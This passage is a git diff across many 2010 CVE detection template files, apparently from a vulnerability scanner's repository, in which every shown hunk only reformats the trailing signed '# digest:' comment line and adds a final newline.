4a0a0047304502203cf8aaf42dd413a52879f6955e02ae2cd47d8f26f14c6483098028a7dd26f3df022100f0b9faf5049befd71463c5c03e1483562066aa710d7fa636c72081c50d514f63:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-0943.yaml b/http/cves/2010/CVE-2010-0943.yaml index 20c756be26..c8a529abd0 100644 --- a/http/cves/2010/CVE-2010-0943.yaml +++ b/http/cves/2010/CVE-2010-0943.yaml @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201d39b3e4c78a16a231b14edf3ab9568809db8461bba3838086d25b7ebaac56ef022100be87c34b118dfe3cdef0f5cbb23d7af5e96e81846c862d12640c8c3a9aa0baf0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502201d39b3e4c78a16a231b14edf3ab9568809db8461bba3838086d25b7ebaac56ef022100be87c34b118dfe3cdef0f5cbb23d7af5e96e81846c862d12640c8c3a9aa0baf0:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-0944.yaml b/http/cves/2010/CVE-2010-0944.yaml index f1de79166f..8aee9e5169 100644 --- a/http/cves/2010/CVE-2010-0944.yaml +++ b/http/cves/2010/CVE-2010-0944.yaml @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100babc370f6ea5fe468f54d5d131a285cf01763e6b78b0d064f4e659737642dc2c022030a497c992d3e47e7e48f52109a4b015bb8307501420cc6335b65ef1ae935925:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100babc370f6ea5fe468f54d5d131a285cf01763e6b78b0d064f4e659737642dc2c022030a497c992d3e47e7e48f52109a4b015bb8307501420cc6335b65ef1ae935925:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-0972.yaml b/http/cves/2010/CVE-2010-0972.yaml index 827cf3580d..b42130eb13 100644 --- a/http/cves/2010/CVE-2010-0972.yaml +++ b/http/cves/2010/CVE-2010-0972.yaml @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100eddce6d0ab7ab292c038d7b85eaa89187c9097067d2bfc6c6a8e730644975dc702207a3ba823e247161ae18d27ee42980a6c985cfd4dbf76c7b17a2beb497b6fbb1f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100eddce6d0ab7ab292c038d7b85eaa89187c9097067d2bfc6c6a8e730644975dc702207a3ba823e247161ae18d27ee42980a6c985cfd4dbf76c7b17a2beb497b6fbb1f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-0982.yaml b/http/cves/2010/CVE-2010-0982.yaml index 02c0e88563..0a41f418c2 100644 --- a/http/cves/2010/CVE-2010-0982.yaml +++ b/http/cves/2010/CVE-2010-0982.yaml @@ -37,4 +37,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100bef6dbb62c97bfe4c62a7fc160582828768ab8387db4a42e3b1adb8c7ca9ba060221009e1cfe248ec471fbc70dd99c7f0813c4f57a4043a3317f07843bf6d2cf6fce56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100bef6dbb62c97bfe4c62a7fc160582828768ab8387db4a42e3b1adb8c7ca9ba060221009e1cfe248ec471fbc70dd99c7f0813c4f57a4043a3317f07843bf6d2cf6fce56:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-0985.yaml b/http/cves/2010/CVE-2010-0985.yaml index 2a0e8eacdd..aa28b78c9f 100644 --- a/http/cves/2010/CVE-2010-0985.yaml +++ b/http/cves/2010/CVE-2010-0985.yaml @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e1aae4553c445459fd2282cfaf52c19cca1aba22d6df5fa69f9efe4554b0b25002202fb2838c0bf5062294cdf78ee369abbd24bbccbbb743599fcd1ca5e0d1145ab6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100e1aae4553c445459fd2282cfaf52c19cca1aba22d6df5fa69f9efe4554b0b25002202fb2838c0bf5062294cdf78ee369abbd24bbccbbb743599fcd1ca5e0d1145ab6:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1056.yaml b/http/cves/2010/CVE-2010-1056.yaml index 2afba71c42..b0868c4b22 100644 --- a/http/cves/2010/CVE-2010-1056.yaml +++ b/http/cves/2010/CVE-2010-1056.yaml @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 490a004630440220018c2af4e61b91442d709fb1268fafd657a56ff1faa017d47761a6bb86c9113002205b0547daaa1c4cba1ae86589151bfd94e4ea36d361ddde6b732c88f17d31ec64:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220018c2af4e61b91442d709fb1268fafd657a56ff1faa017d47761a6bb86c9113002205b0547daaa1c4cba1ae86589151bfd94e4ea36d361ddde6b732c88f17d31ec64:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1081.yaml b/http/cves/2010/CVE-2010-1081.yaml index 6774d92515..d8b0bf5213 100644 --- a/http/cves/2010/CVE-2010-1081.yaml +++ b/http/cves/2010/CVE-2010-1081.yaml @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402205e771211d7a1ea573565e628eefce017167cafc6e7012c5cd5e5e1949ae23788022057605ccf227358fea6ddedb7e213dfe036cb7d3abd3e3c8306f93c959b325519:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402205e771211d7a1ea573565e628eefce017167cafc6e7012c5cd5e5e1949ae23788022057605ccf227358fea6ddedb7e213dfe036cb7d3abd3e3c8306f93c959b325519:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1217.yaml b/http/cves/2010/CVE-2010-1217.yaml index aa5ef2ea17..ec191cf594 100644 --- a/http/cves/2010/CVE-2010-1217.yaml +++ b/http/cves/2010/CVE-2010-1217.yaml @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 490a004630440220460931be86e6750e80d5610f2c1c0b2c2522109ef718d1b5feced5f76f325d5602202cfa005553ce4ae0ce4ac4ceee2a947800ed12148e6489ab3b7f6317d5ad9e2c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220460931be86e6750e80d5610f2c1c0b2c2522109ef718d1b5feced5f76f325d5602202cfa005553ce4ae0ce4ac4ceee2a947800ed12148e6489ab3b7f6317d5ad9e2c:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1219.yaml b/http/cves/2010/CVE-2010-1219.yaml index 783baa442d..8429b84210 100644 --- a/http/cves/2010/CVE-2010-1219.yaml +++ b/http/cves/2010/CVE-2010-1219.yaml @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022027bfa9e2bebeee496f954b3808141438299d9ffa260f32bec79e4af468839eea022100b38679f052c70b348fee3dd0ee76b18d5c62adb72ec7a4feef076df7dd28d8df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022027bfa9e2bebeee496f954b3808141438299d9ffa260f32bec79e4af468839eea022100b38679f052c70b348fee3dd0ee76b18d5c62adb72ec7a4feef076df7dd28d8df:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1302.yaml b/http/cves/2010/CVE-2010-1302.yaml index fe1c9f2089..1d5eca8c1d 100644 --- a/http/cves/2010/CVE-2010-1302.yaml +++ b/http/cves/2010/CVE-2010-1302.yaml @@ -37,4 +37,5 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210098548affe0090e3174210c6dc51e8f450f435e94e93b836057113b47fce97ad6022100e5349b40e026f23d74b44ba80b50c9b2c13f1cfcc99d1874eefbf128660e79ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a0048304602210098548affe0090e3174210c6dc51e8f450f435e94e93b836057113b47fce97ad6022100e5349b40e026f23d74b44ba80b50c9b2c13f1cfcc99d1874eefbf128660e79ed:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1304.yaml b/http/cves/2010/CVE-2010-1304.yaml index ae2f151aa5..445c648756 100644 --- a/http/cves/2010/CVE-2010-1304.yaml +++ b/http/cves/2010/CVE-2010-1304.yaml @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100eca70d8f5fbf4d7abbab39bb0036f30a3d0681d49dbf500c3e14b915e2d0a3e70221009d1653ca4fab50bbc58463f5f160c18b6559f9b94c982c91e9961b324e7780e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100eca70d8f5fbf4d7abbab39bb0036f30a3d0681d49dbf500c3e14b915e2d0a3e70221009d1653ca4fab50bbc58463f5f160c18b6559f9b94c982c91e9961b324e7780e2:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1305.yaml b/http/cves/2010/CVE-2010-1305.yaml index 0ef92f257c..1ee17bb3d8 100644 --- a/http/cves/2010/CVE-2010-1305.yaml +++ b/http/cves/2010/CVE-2010-1305.yaml @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022070c196dfbc76e21497ddb04451b94f66f19de4a1c560786dfcb99ea4f6b8d017022100a1543d91984fda34952f4751031a7df4b3bee640fae2810042405b6d49157491:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022070c196dfbc76e21497ddb04451b94f66f19de4a1c560786dfcb99ea4f6b8d017022100a1543d91984fda34952f4751031a7df4b3bee640fae2810042405b6d49157491:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1306.yaml b/http/cves/2010/CVE-2010-1306.yaml index 0c7070f990..0fcd0e4d46 100644 --- a/http/cves/2010/CVE-2010-1306.yaml +++ b/http/cves/2010/CVE-2010-1306.yaml @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f333d42341eda9f4a38a17ff971b7f0b774b73c811c4d64d56f46bdad9abef37022100e6151f7cd62bbd26bca43ff1c26f26092979b42a83befc2e05cd5eae61afaf72:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100f333d42341eda9f4a38a17ff971b7f0b774b73c811c4d64d56f46bdad9abef37022100e6151f7cd62bbd26bca43ff1c26f26092979b42a83befc2e05cd5eae61afaf72:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1307.yaml b/http/cves/2010/CVE-2010-1307.yaml index 227a1549dc..5d632f7125 100644 --- a/http/cves/2010/CVE-2010-1307.yaml +++ b/http/cves/2010/CVE-2010-1307.yaml @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e4c614bb52138a9133f9bfe395f6858ca749a1e5a8b2abee241dd081a4a1e9f1022100efc7535f851a17d9396fd29d6bea18536b4ec1430545966647235b9d98201fca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100e4c614bb52138a9133f9bfe395f6858ca749a1e5a8b2abee241dd081a4a1e9f1022100efc7535f851a17d9396fd29d6bea18536b4ec1430545966647235b9d98201fca:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1308.yaml b/http/cves/2010/CVE-2010-1308.yaml index 78c46ec6d9..1172761f5d 100644 --- a/http/cves/2010/CVE-2010-1308.yaml +++ b/http/cves/2010/CVE-2010-1308.yaml @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b5b708ebfeaff085a7054f39ed423ecb8d7df7f6b68b20910d9114127f3fb9f802200e9c311a813cf9ad6f8bfd513fc12a1f18e86c618e0865139a441a2b4f09d416:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100b5b708ebfeaff085a7054f39ed423ecb8d7df7f6b68b20910d9114127f3fb9f802200e9c311a813cf9ad6f8bfd513fc12a1f18e86c618e0865139a441a2b4f09d416:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1312.yaml b/http/cves/2010/CVE-2010-1312.yaml index f3d42f4df5..eec660de69 100644 --- a/http/cves/2010/CVE-2010-1312.yaml +++ b/http/cves/2010/CVE-2010-1312.yaml @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a33371a1b8a523ace3527b67eb76b7ef31c1be8c53932cc8c65d83d5bdca48fc02202a1119d593f126e091de50adaaf9a54703a929a5eeebc0969159d8e226e710ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100a33371a1b8a523ace3527b67eb76b7ef31c1be8c53932cc8c65d83d5bdca48fc02202a1119d593f126e091de50adaaf9a54703a929a5eeebc0969159d8e226e710ee:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1313.yaml b/http/cves/2010/CVE-2010-1313.yaml index c18570f834..ae5c87f73c 100644 --- a/http/cves/2010/CVE-2010-1313.yaml +++ b/http/cves/2010/CVE-2010-1313.yaml @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e0672493f8685284775e9a89fb3f538e9d6542c18231a8bc2adfa6e962e87f380221008fba7a956d306427730cc87e5d88eec1bd3f14d81a7046ab949dccdd9e2a9179:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100e0672493f8685284775e9a89fb3f538e9d6542c18231a8bc2adfa6e962e87f380221008fba7a956d306427730cc87e5d88eec1bd3f14d81a7046ab949dccdd9e2a9179:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1314.yaml b/http/cves/2010/CVE-2010-1314.yaml index 2f24564319..cbce506c4c 100644 --- a/http/cves/2010/CVE-2010-1314.yaml +++ b/http/cves/2010/CVE-2010-1314.yaml @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203efed490b383134c8010c92870ae19e48f3c2e499cae7391fccaec82a75de3bc022100f8a95216113d7750b25581c175adcaa7c90e9c404ee753bed3b3cf1fe8d8af61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502203efed490b383134c8010c92870ae19e48f3c2e499cae7391fccaec82a75de3bc022100f8a95216113d7750b25581c175adcaa7c90e9c404ee753bed3b3cf1fe8d8af61:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1315.yaml b/http/cves/2010/CVE-2010-1315.yaml index 2edba8793f..9a17b1ee4d 100644 --- a/http/cves/2010/CVE-2010-1315.yaml +++ b/http/cves/2010/CVE-2010-1315.yaml @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402204244f42191651dfb9c9809725ee651f12f260153d5b288a75a80d3db78392973022018ec35620a2da3f8d6fbe6d972941105653ac57a2840ae8f09e709fe01a7e2d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402204244f42191651dfb9c9809725ee651f12f260153d5b288a75a80d3db78392973022018ec35620a2da3f8d6fbe6d972941105653ac57a2840ae8f09e709fe01a7e2d6:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1340.yaml b/http/cves/2010/CVE-2010-1340.yaml index 3150b9b7ff..c1ab1e2355 100644 --- a/http/cves/2010/CVE-2010-1340.yaml +++ b/http/cves/2010/CVE-2010-1340.yaml @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100fe7d0053a5e66e153096ebda40c33834f6c0dddfe25d573cd2a9bc863548db6102204a6ffc6791c9f8cdd301cc4832840ddc90f2c3c07c1689c5824c4db16233cd67:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100fe7d0053a5e66e153096ebda40c33834f6c0dddfe25d573cd2a9bc863548db6102204a6ffc6791c9f8cdd301cc4832840ddc90f2c3c07c1689c5824c4db16233cd67:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1345.yaml b/http/cves/2010/CVE-2010-1345.yaml index 57a6919a33..2197e91f65 100644 --- a/http/cves/2010/CVE-2010-1345.yaml +++ b/http/cves/2010/CVE-2010-1345.yaml @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402201fc18bc0c1ee31bfe23597fb098fe69c79090d63931791e1ee413c8cd98ec7f90220745647bb66f0af91a63b66da233a0a8aa956e4eb8c106f261d06ffe80e700fd9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402201fc18bc0c1ee31bfe23597fb098fe69c79090d63931791e1ee413c8cd98ec7f90220745647bb66f0af91a63b66da233a0a8aa956e4eb8c106f261d06ffe80e700fd9:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1352.yaml b/http/cves/2010/CVE-2010-1352.yaml index e9ca30fad4..09321041cf 100644 --- a/http/cves/2010/CVE-2010-1352.yaml +++ b/http/cves/2010/CVE-2010-1352.yaml @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ed626a2b6c592a9f5f86ad4718bb09c5f40f820dd3a7fa24b6d5ac7ccfd8feb2022070221def9f3b68a2451c2bf73582d84df323b9fd4df8fb766926eb6109127aad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100ed626a2b6c592a9f5f86ad4718bb09c5f40f820dd3a7fa24b6d5ac7ccfd8feb2022070221def9f3b68a2451c2bf73582d84df323b9fd4df8fb766926eb6109127aad:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1353.yaml b/http/cves/2010/CVE-2010-1353.yaml index 8b65cfc080..7a78f2b484 100644 --- a/http/cves/2010/CVE-2010-1353.yaml +++ b/http/cves/2010/CVE-2010-1353.yaml @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ded7d5c95ddc68513f310ee2d1d91fa1a7adb355fa9ad9a97b487de412c13e95022100b4a906695adfec03b44b312aeb3b2bd9e630ec377307fb082d6b33460d17feb9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100ded7d5c95ddc68513f310ee2d1d91fa1a7adb355fa9ad9a97b487de412c13e95022100b4a906695adfec03b44b312aeb3b2bd9e630ec377307fb082d6b33460d17feb9:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1354.yaml b/http/cves/2010/CVE-2010-1354.yaml index 4a3bdc1f11..9647ad061f 100644 --- a/http/cves/2010/CVE-2010-1354.yaml +++ b/http/cves/2010/CVE-2010-1354.yaml @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022020cec573bdc129c14f0fe9ca14c2e64cb58a0c4fe1f2258a2976b39aead5d86e022100918481bc4fb0d928027d813bf25e7bcea7168f9fbe698d9deeae50ba20ba2dfa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022020cec573bdc129c14f0fe9ca14c2e64cb58a0c4fe1f2258a2976b39aead5d86e022100918481bc4fb0d928027d813bf25e7bcea7168f9fbe698d9deeae50ba20ba2dfa:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1429.yaml b/http/cves/2010/CVE-2010-1429.yaml index 2d54f758ec..32bbba61dd 100644 --- a/http/cves/2010/CVE-2010-1429.yaml +++ b/http/cves/2010/CVE-2010-1429.yaml @@ -47,4 +47,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ddd0a1d13b4179c9b1acd43d34b26b72ca2b222a761ca2d47f119259bfc8b7d102207ac1bf2332b65e1fc49133edc0ca37c86e2076bfa06a9c3bf835a0749da6ace0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100ddd0a1d13b4179c9b1acd43d34b26b72ca2b222a761ca2d47f119259bfc8b7d102207ac1bf2332b65e1fc49133edc0ca37c86e2076bfa06a9c3bf835a0749da6ace0:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1461.yaml b/http/cves/2010/CVE-2010-1461.yaml index 0de28ff050..f265fbc953 100644 --- a/http/cves/2010/CVE-2010-1461.yaml +++ b/http/cves/2010/CVE-2010-1461.yaml @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205917eddb35cd731209be039115b48d93e149e47d0c558be6cf8b3b3cac50f4df022100e182400df070fb59e3ea4ccbb8d57161ead92ab8903274341b16ea8226e00733:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502205917eddb35cd731209be039115b48d93e149e47d0c558be6cf8b3b3cac50f4df022100e182400df070fb59e3ea4ccbb8d57161ead92ab8903274341b16ea8226e00733:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1469.yaml b/http/cves/2010/CVE-2010-1469.yaml index 241e7b88b6..1b3d485fe7 100644 --- a/http/cves/2010/CVE-2010-1469.yaml +++ b/http/cves/2010/CVE-2010-1469.yaml @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022065100ec2519857682b9a875ddb1a7484d8dadddb8843cae77899baf57316f5b3022003a0d93be628431fb3e688310b629e3cc1e6c1c1dff803366f6d16a5c94b6f68:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022065100ec2519857682b9a875ddb1a7484d8dadddb8843cae77899baf57316f5b3022003a0d93be628431fb3e688310b629e3cc1e6c1c1dff803366f6d16a5c94b6f68:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1470.yaml b/http/cves/2010/CVE-2010-1470.yaml index f37f3dc2df..5602bccfe4 100644 --- a/http/cves/2010/CVE-2010-1470.yaml +++ b/http/cves/2010/CVE-2010-1470.yaml @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402204add677bc44e9b8f4bc64410baa2d4521b48e6d81c5f9b1316994f38fddbbfe302206ec656be7a9e9da55a3a967399ccb582e8955eeef245c8fe0a174d9a265f1d29:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402204add677bc44e9b8f4bc64410baa2d4521b48e6d81c5f9b1316994f38fddbbfe302206ec656be7a9e9da55a3a967399ccb582e8955eeef245c8fe0a174d9a265f1d29:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1471.yaml b/http/cves/2010/CVE-2010-1471.yaml index 67a545f9c9..07e65406b5 100644 --- a/http/cves/2010/CVE-2010-1471.yaml +++ b/http/cves/2010/CVE-2010-1471.yaml @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203530b73c6e92308ef46678d1743cd4f3733fce07970fcee8d95fca7590a469c50221009cc2aacc1d95cf1ea94074572ff5cd3ac67f9faa1ecf15e53d931553c1b4f942:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502203530b73c6e92308ef46678d1743cd4f3733fce07970fcee8d95fca7590a469c50221009cc2aacc1d95cf1ea94074572ff5cd3ac67f9faa1ecf15e53d931553c1b4f942:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1472.yaml b/http/cves/2010/CVE-2010-1472.yaml index f0d6d08fdf..b9f759aafa 100644 --- a/http/cves/2010/CVE-2010-1472.yaml +++ b/http/cves/2010/CVE-2010-1472.yaml @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 490a004630440220437e9da2c3df847982aad2e0eb31a31471366824dee57921a8fc5cde96b3d29b022012e2c1d736ac56bd2c57d16d1db0a39e4f073b99cf9d78f93c6646b26ba79e05:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220437e9da2c3df847982aad2e0eb31a31471366824dee57921a8fc5cde96b3d29b022012e2c1d736ac56bd2c57d16d1db0a39e4f073b99cf9d78f93c6646b26ba79e05:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1473.yaml b/http/cves/2010/CVE-2010-1473.yaml index 8cac794747..77db4aeb84 100644 --- a/http/cves/2010/CVE-2010-1473.yaml +++ b/http/cves/2010/CVE-2010-1473.yaml @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402204e89f16a5e2a7d7f54fc55f86b59a53a69e057fc1bc84b300d706c9b3ab2ad8602204cffc5724a390ec7038ee37d0134d212f32fce73fedddcf452142bc6fd519c4f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402204e89f16a5e2a7d7f54fc55f86b59a53a69e057fc1bc84b300d706c9b3ab2ad8602204cffc5724a390ec7038ee37d0134d212f32fce73fedddcf452142bc6fd519c4f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1474.yaml b/http/cves/2010/CVE-2010-1474.yaml index 205ad062aa..0caca53e6d 100644 --- a/http/cves/2010/CVE-2010-1474.yaml +++ b/http/cves/2010/CVE-2010-1474.yaml @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c8f83c59f57d991645a9d551641133d9395cec68dc7eb843e7e1b6a40206c6320220214161bccd93f7b5d3cc724fadec2f8cf768c3204342015d79785b7001f31fbb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100c8f83c59f57d991645a9d551641133d9395cec68dc7eb843e7e1b6a40206c6320220214161bccd93f7b5d3cc724fadec2f8cf768c3204342015d79785b7001f31fbb:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1475.yaml b/http/cves/2010/CVE-2010-1475.yaml index 3ec2166556..39bc720c84 100644 --- a/http/cves/2010/CVE-2010-1475.yaml +++ b/http/cves/2010/CVE-2010-1475.yaml @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402207c808f619b21a8994dd7e72917345720454e44dbc2cfb1c012dbf58d6a1d34ca02206e64962cc5434fc17d890f9eb782025293f77b1802f0b30c3635108960815364:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402207c808f619b21a8994dd7e72917345720454e44dbc2cfb1c012dbf58d6a1d34ca02206e64962cc5434fc17d890f9eb782025293f77b1802f0b30c3635108960815364:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1476.yaml b/http/cves/2010/CVE-2010-1476.yaml index 4c4108d117..09be20e839 100644 --- a/http/cves/2010/CVE-2010-1476.yaml +++ b/http/cves/2010/CVE-2010-1476.yaml @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402204489ab3ce5d6b268596689b4cba269cfb78a20136551262b3024345992f94af102200ed271054c5b7811cce9766750dd0af64e7b297b0f27e137cf0a0526db859f19:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402204489ab3ce5d6b268596689b4cba269cfb78a20136551262b3024345992f94af102200ed271054c5b7811cce9766750dd0af64e7b297b0f27e137cf0a0526db859f19:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1478.yaml b/http/cves/2010/CVE-2010-1478.yaml index 268a9774d9..0c78a2c19d 100644 --- a/http/cves/2010/CVE-2010-1478.yaml +++ b/http/cves/2010/CVE-2010-1478.yaml @@ -37,4 +37,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008fa4fbb39c50232165fa265491f1a123acbd28c333b3f3c0cd556af5a229ffc102207ff8fe5d47493fc97245504586c2e868f9cb33ecf24bad7b8bbd84a33ae873e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450221008fa4fbb39c50232165fa265491f1a123acbd28c333b3f3c0cd556af5a229ffc102207ff8fe5d47493fc97245504586c2e868f9cb33ecf24bad7b8bbd84a33ae873e1:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1491.yaml b/http/cves/2010/CVE-2010-1491.yaml index db3ec212ed..91cd598190 100644 --- a/http/cves/2010/CVE-2010-1491.yaml +++ b/http/cves/2010/CVE-2010-1491.yaml @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203c9817afb2554a891454ede4a1aa8bde517b81916ce37579d12df422212b65a2022100f5a449d1c239f325eb3995a2a31ab8d64e9668f223b9dc4368d11de5ffd12839:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502203c9817afb2554a891454ede4a1aa8bde517b81916ce37579d12df422212b65a2022100f5a449d1c239f325eb3995a2a31ab8d64e9668f223b9dc4368d11de5ffd12839:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1495.yaml b/http/cves/2010/CVE-2010-1495.yaml index 51a9288b9e..9b06eafe68 100644 --- a/http/cves/2010/CVE-2010-1495.yaml +++ b/http/cves/2010/CVE-2010-1495.yaml @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022031fd5d2314209d164ea3623c122b2ff4f9ee6b2acf61f5b9ea28020ae15270070220786b899924d3d46f5a96e152c96e5af3e188b15f519202f958f10445021fb8dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022031fd5d2314209d164ea3623c122b2ff4f9ee6b2acf61f5b9ea28020ae15270070220786b899924d3d46f5a96e152c96e5af3e188b15f519202f958f10445021fb8dd:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1531.yaml b/http/cves/2010/CVE-2010-1531.yaml index 919615a08c..3ec7bbc964 100644 --- a/http/cves/2010/CVE-2010-1531.yaml +++ b/http/cves/2010/CVE-2010-1531.yaml @@ -40,4 +40,5 